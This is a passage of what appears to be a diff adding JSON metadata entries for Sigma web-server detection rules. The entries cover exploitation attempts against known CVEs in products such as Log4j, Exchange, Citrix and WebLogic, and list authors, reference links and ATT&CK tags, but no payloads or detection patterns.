"https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" + ], + "tags": "No established tags" + }, + "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", + "value": "Apache Threading Error" + }, + { + "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\n", + "meta": { + "author": "Subhash Popuri (@pbssubhash)", + "creation_date": "2021/08/25", + "falsepositive": [ + "Scanning from Nuclei", + "Unknown" + ], + "filename": "web_cve_2010_5278_exploitation_attempt.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2010_5278_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", + "value": "CVE-2010-5278 Exploitation Attempt" + }, + { + "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2014_6287_hfs_rce.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", + "https://www.exploit-db.com/exploits/39161", + "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.t1505.003", + "cve.2014.6287" + ] + }, + "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", + "value": "Rejetto HTTP File Server RCE" + }, + { + "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/12/08", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", + "value": "Fortinet CVE-2018-13379 Exploitation" + }, + { + "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/07/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2018_2894_weblogic_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/pyn3rd/status/1020620932967223296", + "https://github.com/LandGrey/CVE-2018-2894", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.t1505.003", + "cve.2018.2894" + ] + }, + "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", + "value": "Oracle WebLogic Exploit" + }, + { + "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_11510_pulsesecure_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.exploit-db.com/exploits/47297", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_11510_pulsesecure_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", + "value": "Pulse Secure Attack CVE-2019-11510" + }, + { + "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack", + "meta": { + "author": "Arnim Rupp, Florian Roth", + "creation_date": "2020/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_19781_citrix_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://support.citrix.com/article/CTX267679", + "https://support.citrix.com/article/CTX267027", + "https://isc.sans.edu/diary/25686", + "https://twitter.com/mpgn_x64/status/1216787131210829826", + "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", + "value": "Citrix Netscaler Attack CVE-2019-19781" + }, + { + "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_3398_confluence.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_3398_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b", + "value": "Confluence Exploitation CVE-2019-3398" + }, + { + "description": "Detects CVE-2020-0688 Exploitation attempts", + "meta": { + "author": "NVISO", + "creation_date": "2020/02/27", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_0688_exchange_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/Ridter/cve-2020-0688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", + "value": "CVE-2020-0688 Exploitation Attempt" + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/02/29", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_0688_msexchange.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_msexchange.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", + "value": "CVE-2020-0688 Exchange Exploitation via Web Log" + }, + { + "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts", + "meta": { + "author": "Bhabesh Raj, Tim Shelton", + "creation_date": "2020/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_10148_solarwinds_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://kb.cert.org/vuls/id/843464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_10148_solarwinds_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", + "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass" + }, + { + "description": "Detects exploitation attempts on WebLogic servers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/11/02", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_14882_weblogic_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://isc.sans.edu/diary/26734", + "https://twitter.com/jas502n/status/1321416053050667009?s=20", + "https://twitter.com/sudo_sudoka/status/1323951871078223874", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.14882" + ] + }, + "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", + "value": "Oracle WebLogic Exploit CVE-2020-14882" + }, + { + "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/25", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", + "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.28188" + ] + }, + "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", + "value": "TerraMaster TOS CVE-2020-28188" + }, + { + "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/07", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_3452_cisco_asa_ftd.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/aboul3la/status/1286012324722155525", + "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.3452" + ] + }, + "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", + "value": "Cisco ASA FTD Exploit CVE-2020-3452" + }, + { + "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_5902_f5_bigip.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://support.f5.com/csp/article/K52145254", + "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", + "https://twitter.com/yorickkoster/status/1279709009151434754", + "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", + "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt" + }, + { + "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_8193_8195_citrix_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://support.citrix.com/article/CTX276688", + "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", + "https://dmaasland.github.io/posts/citrix.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", + "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195" + }, + { + "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", + "https://www.tenable.com/security/research/tra-2021-13", + "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.20090", + "cve.2021.20091" + ] + }, + "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", + "value": "Arcadyan Router Exploitations" + }, + { + "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/20", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/pyn3rd/status/1351696768065409026", + "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2021.2109" + ] + }, + "uuid": "687f6504-7f44-4549-91fc-f07bab065821", + "value": "Oracle WebLogic Exploit CVE-2021-2109" + }, + { + "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/24", + "falsepositive": [ + "OVA uploads to your VSphere appliance" + ], + "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", + "https://f5.pm/go-59627.html", + "https://swarm.ptsecurity.com/unauth-rce-vmware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", + "value": "CVE-2021-21972 VSphere Exploitation" + }, + { + "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/03/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/wugeej/status/1369476795255320580", + "https://paper.seebug.org/1495/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978" + ] + }, + "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", + "value": "CVE-2021-21978 Exploitation Attempt" + }, + { + "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/09/24", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_22005_vmware_file_upload.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://kb.vmware.com/s/article/85717", + "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", + "value": "VMware vCenter Server File Upload CVE-2021-22005" + }, + { + "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs", + "meta": { + "author": "Bhabesh Raj, Florian Roth", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_22123_fortinet_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22123_fortinet_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4", + "value": "Fortinet CVE-2021-22123 Exploitation" + }, + { + "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/29", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", + "value": "Pulse Connect Secure RCE Attack CVE-2021-22893" + }, + { + "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_26814_wzuh_rce.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26814_wzuh_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978", + "cve.2021.26814" + ] + }, + "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", + "value": "Exploitation of CVE-2021-26814 in Wazuh" + }, + { + "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories", + "meta": { + "author": "frack113", + "creation_date": "2021/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "web_cve_2021_26858_iis_rce.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "windows", + "refs": [ + "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26858_iis_rce.yml" + ], + "tags": "No established tags" + }, + "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a", + "value": "ProxyLogon Reset Virtual Directories Based On IIS Log" + }, + { + "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_28480_exchange_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_28480_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", + "value": "Exchange Exploitation CVE-2021-28480" + }, + { + "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766", + "meta": { + "author": "Florian Roth, Max Altgelt, Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_33766_msexchange_proxytoken.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a", + "value": "CVE-2021-33766 Exchange ProxyToken Exploitation" + }, + { + "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539", + "meta": { + "author": "Tobias Michalski, Max Altgelt", + "creation_date": "2021/09/20", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_40539_adselfservice.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_adselfservice.yml" + ], + "tags": "No established tags" + }, + "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11", + "value": "ADSelfService Exploitation" + }, + { + "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).", + "meta": { + "author": "Sittikorn S, Nuttakorn Tungpoonsup", + "creation_date": "2021/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", + "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", + "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit" + }, + { + "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n", + "meta": { + "author": "daffainfo, Florian Roth", + "creation_date": "2021/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_41773_apache_path_traversal.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", + "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", + "https://twitter.com/ptswarm/status/1445376079548624899", + "https://twitter.com/h4x0r_dz/status/1445401960371429381", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", + "https://twitter.com/bl4sty/status/1445462677824761878", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", + "value": "CVE-2021-41773 Exploitation Attempt" + }, + { + "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/17", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_42237_sitecore_report_ashx.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://blog.assetnote.io/2021/11/02/sitecore-rce/", + "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", + "value": "Sitecore Pre-Auth RCE CVE-2021-42237" + }, + { + "description": "Detects a successful Grafana path traversal exploitation", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/08", + "falsepositive": [ + "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error" + ], + "filename": "web_cve_2021_43798_grafana.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", + "https://github.com/search?q=CVE-2021-43798", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", + "value": "Grafana Path Traversal Exploitation CVE-2021-43798" + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/10", + "falsepositive": [ + "Vulnerability scanning" + ], + "filename": "web_cve_2021_44228_log4j.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702", + "value": "Log4j RCE CVE-2021-44228 Generic" + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/10", + "falsepositive": [ + "Vulnerability scanning" + ], + "filename": "web_cve_2021_44228_log4j_fields.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", + "value": "Log4j RCE CVE-2021-44228 in Fields" + }, + { + "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2022_27925_exploit.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", + "https://www.yang99.top/index.php/archives/82/", + "https://github.com/vnhacker1337/CVE-2022-27925-PoC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.27925" + ] + }, + "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", + "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE" + }, + { + "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Vulnerability scanners" + ], + "filename": "web_cve_2022_31656_auth_bypass.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31656_auth_bypass.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": 